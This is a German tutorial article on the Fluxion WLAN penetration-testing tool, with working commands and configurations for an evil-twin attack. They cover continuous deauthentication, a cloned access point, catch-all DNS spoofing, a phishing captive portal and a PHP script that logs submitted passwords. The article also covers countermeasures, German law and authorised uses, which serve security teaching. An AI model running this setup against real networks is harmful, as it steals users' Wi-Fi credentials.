Fluxion Tool: Detaillierte Analyse von WLAN-Sicherheitsmechanismen
Das Fluxion Tool ist ein leistungsstarkes Open-Source-Werkzeug zur Tiefenanalyse von Sicherheitsmechanismen in drahtlosen Netzwerken. Es wurde für IT-Sicherheitsexperten, Penetrationstester und Netzwerkadministratoren entwickelt, die Schwachstellen in WLAN-Infrastrukturen identifizieren und beheben möchten.
Überblick
Fluxion nutzt eine Kombination von Techniken, um Authentifizierungsdaten aus WLAN-Netzwerken zu extrahieren. Dabei stehen Man-in-the-Middle-Angriffe (MitM) im Vordergrund, die es ermöglichen, Daten zwischen zwei Kommunikationspartnern abzufangen oder zu manipulieren. Durch das Erstellen von Fake Access Points und das gezielte Deauthentifizieren von Clients werden Benutzer dazu gebracht, ihre Zugangsdaten einzugeben.
Funktionsweise
Vorbereitungen und Anforderungen
Bevor Fluxion eingesetzt werden kann, sind bestimmte Hardware- und Softwarevoraussetzungen zu erfüllen:
- WLAN-Netzwerkkarte: Die Netzwerkkarte muss den Monitor-Modus und Packet Injection unterstützen (z. B. Chipsätze von Atheros oder Ralink).
- Linux-Betriebssystem: Eine Distribution wie Kali Linux oder Parrot OS wird empfohlen, da sie bereits viele benötigte Tools enthalten.
- Abhängigkeiten: Installation von Tools wie aircrack-ng, hostapd, dnsmasq, lighttpd und andere.
Scannen und Identifizieren von Netzwerken
Fluxion beginnt mit dem Scannen der Umgebung nach verfügbaren WLAN-Netzwerken. Mit Hilfe von airmon-ng wird der Monitor-Modus aktiviert:
airmon-ng start wlan0Anschließend werden mit airodump-ng die verfügbaren Netzwerke gelistet:
airodump-ng wlan0monBeispielausgabe:
| BSSID | PWR | Beacons | Data | CH | MB | ENC | CIPHER | AUTH | ESSID |
|---|---|---|---|---|---|---|---|---|---|
| 00:0F:66:85:FC:B0 | -50 | 100 | 0 | 6 | 54e | WPA2 | CCMP | PSK | Heimnetzwerk |
Auswahl des Zielnetzwerks
Der Penetrationstester wählt das Zielnetzwerk basierend auf den gesammelten Informationen aus:
- ESSID: “Heimnetzwerk”
- BSSID: 00:0F:66:85:FC:B0
- Kanal: 6
- Verschlüsselung: WPA2-PSK
Deauthentication Attack
Um Benutzer vom legitimen Access Point zu trennen, wird ein Deauthentifizierungsangriff gestartet. Mit aireplay-ng werden Deauth-Pakete gesendet:
aireplay-ng --deauth 0 -a 00:0F:66:85:FC:B0 wlan0mon- —deauth 0: Sendet kontinuierlich Deauth-Pakete
- -a: MAC-Adresse des Access Points
- wlan0mon: Schnittstelle im Monitor-Modus
Dieser Angriff zwingt die Clients, die Verbindung zum Access Point zu verlieren.
Erstellen eines Fake Access Points
Fluxion erstellt einen gefälschten Access Point mit derselben ESSID wie das Zielnetzwerk. Hierfür wird hostapd verwendet.
Hostapd-Konfigurationsdatei (hostapd.conf):
interface=wlan1
driver=nl80211
ssid=Heimnetzwerk
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
Der gefälschte Access Point agiert auf einem separaten WLAN-Adapter (wlan1).
DNS-Spoofing und Captive Portal
Damit die Nutzer auf die Phishing-Seite umgeleitet werden, wird DNS-Spoofing eingesetzt. Mit dnsmasq wird ein DNS-Server konfiguriert, der alle Anfragen auf die lokale IP-Adresse umleitet.
Dnsmasq-Konfigurationsdatei (dnsmasq.conf):
interface=wlan1
dhcp-range=192.168.1.100,192.168.1.200,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
address=/#/192.168.1.1
Alle DNS-Anfragen werden so auf das lokale Captive Portal geleitet.
Aufbau des Captive Portals
Das Captive Portal simuliert eine authentische Login-Seite. Mit einem Webserver wie lighttpd wird die Phishing-Seite bereitgestellt.
Beispiel einer Phishing-Seite (index.html):
<!DOCTYPE html>
<html>
<head>
<title>WLAN-Verbindung</title>
</head>
<body>
<h2>Wiederherstellung der WLAN-Verbindung</h2>
<p>Bitte bestätigen Sie Ihr Passwort, um die Verbindung wiederherzustellen.</p>
<form action="post.php" method="post">
<label for="password">Passwort:</label>
<input type="password" id="password" name="password">
<input type="submit" value="Bestätigen">
</form>
</body>
</html>Server-Konfiguration (lighttpd.conf):
server.modules = ("mod_access", "mod_alias", "mod_fastcgi")
server.document-root = "/var/www/html/"
server.port = 80
Sammlung und Validierung der Zugangsdaten
Die eingegebenen Zugangsdaten werden mittels eines PHP-Skripts (post.php) gespeichert:
<?php
$password = $_POST['password'];
file_put_contents('credentials.txt', $password.PHP_EOL, FILE_APPEND);
?>Um die Gültigkeit des Passworts zu überprüfen, versucht Fluxion, eine Verbindung zum echten Access Point herzustellen:
wpa_passphrase "Heimnetzwerk" "$password" > wpa.conf
wpa_supplicant -B -i wlan0mon -c wpa.conf
dhclient wlan0monErfolgt eine erfolgreiche Authentifizierung, wird der Angriff beendet.
Einsatzgebiete
Penetration Testing
- Identifizierung von Schwachstellen: Durch Simulation realer Angriffe können Sicherheitslücken aufgedeckt werden.
- Überprüfung von Sicherheitsrichtlinien: Evaluierung der Wirksamkeit von Sicherheitsmaßnahmen und -protokollen.
- Erhöhung der Netzwerksicherheit: Entwicklung von Gegenmaßnahmen basierend auf den Testergebnissen.
Schulungszwecke
- Praktische Ausbildung: Vermittlung von Wissen über WLAN-Sicherheitsrisiken und Angriffsarten.
- Forschung und Entwicklung: Testen neuer Sicherheitsmechanismen und Angriffstechniken.
- Sensibilisierung: Steigerung des Sicherheitsbewusstseins bei Endnutzern und IT-Personal.
Gegenmaßnahmen und Best Practices
Verhinderung von Deauthentication-Angriffen
- IEEE 802.11w Standard: Implementierung von Management Frame Protection (MFP) zum Schutz vor Deauth-Angriffen.
- Überwachung des Netzwerkverkehrs: Einsatz von Intrusion Detection Systems (IDS), um verdächtige Aktivitäten zu erkennen.
Stärkung der Authentifizierung
- Verwendung von WPA3: Modernere Verschlüsselungsstandards bieten verbesserte Sicherheit.
- Radius-Server und 802.1X: Einsatz von Enterprise-Authentifizierungsprotokollen zur sicheren Benutzerauthentifizierung.
Sensibilisierung der Nutzer
- Aufklärung über Phishing: Benutzer sollten Misstrauen gegenüber unerwarteten Login-Aufforderungen entwickeln.
- Überprüfen von Zertifikaten: Bei SSL-Verbindungen sollten Nutzer auf gültige Zertifikate achten.
Technische Maßnahmen
- Rogue Access Point Detection: Implementierung von Tools, die gefälschte Access Points erkennen.
- SSID nicht broadcasten: Verhindert zwar nicht die Erkennung des Netzwerks, erhöht aber die Hürde für Angreifer.
Rechtliche und Ethische Aspekte
Der Einsatz von Fluxion in Netzwerken ohne ausdrückliche Zustimmung des Netzwerkbetreibers ist illegal und kann strafrechtlich verfolgt werden.
Gesetzliche Rahmenbedingungen
- Strafgesetzbuch (StGB):
- §202a StGB: Ausspähen von Daten.
- §303a StGB: Datenveränderung.
- §303b StGB: Computersabotage.
- Telekommunikationsgesetz (TKG):
- Schutz der Vertraulichkeit der Kommunikation.
- Bundesdatenschutzgesetz (BDSG):
- Verarbeitung personenbezogener Daten ohne Einwilligung ist verboten.
Ethische Richtlinien
- Verantwortungsbewusster Umgang: Sicherheitswerkzeuge dürfen nur zum Schutz und nicht zum Schaden eingesetzt werden.
- Einholung von Genehmigungen: Vor Tests muss eine schriftliche Erlaubnis des Netzwerkeigentümers vorliegen.
- Vertraulichkeit: Gefundene Schwachstellen und Daten sind vertraulich zu behandeln und an den Eigentümer zu melden.
Beispiele aus der Praxis
Penetrationstest eines Unternehmensnetzwerks
Ein Sicherheitsberater erhält den Auftrag, das WLAN eines Unternehmens auf Schwachstellen zu überprüfen. Mit Zustimmung des Unternehmens setzt er Fluxion ein, um mögliche Angriffsvektoren zu identifizieren. Er entdeckt, dass die Mitarbeiter auf Phishing-Seiten hereinfallen und empfiehlt Schulungen sowie technische Verbesserungen.
Forschung im akademischen Umfeld
An einer Universität wird Fluxion verwendet, um neue Methoden zur Erkennung von MitM-Angriffen zu entwickeln. Studenten setzen das Tool ein, um Angriffsszenarien zu simulieren und entsprechende Abwehrmechanismen zu testen.
Fazit
Fluxion ist ein mächtiges und vielseitiges Werkzeug zur Analyse von WLAN-Sicherheitsmechanismen. Es verdeutlicht die Notwendigkeit ständiger Überwachung und Aktualisierung von Sicherheitsmaßnahmen in drahtlosen Netzwerken. Der verantwortungsvolle Umgang mit solchen Tools ist entscheidend, um die Sicherheit zu erhöhen und gesetzliche Vorschriften einzuhalten. Durch technische Maßnahmen und Benutzeraufklärung können die Risiken von Angriffen wie denen, die Fluxion demonstriert, deutlich reduziert werden.
TagsFluxionWLANSicherheitPenetrationTestingNetzwerkanalyseCyberSecurityEthicalHackingWirelessSecurityManInTheMiddlePhishing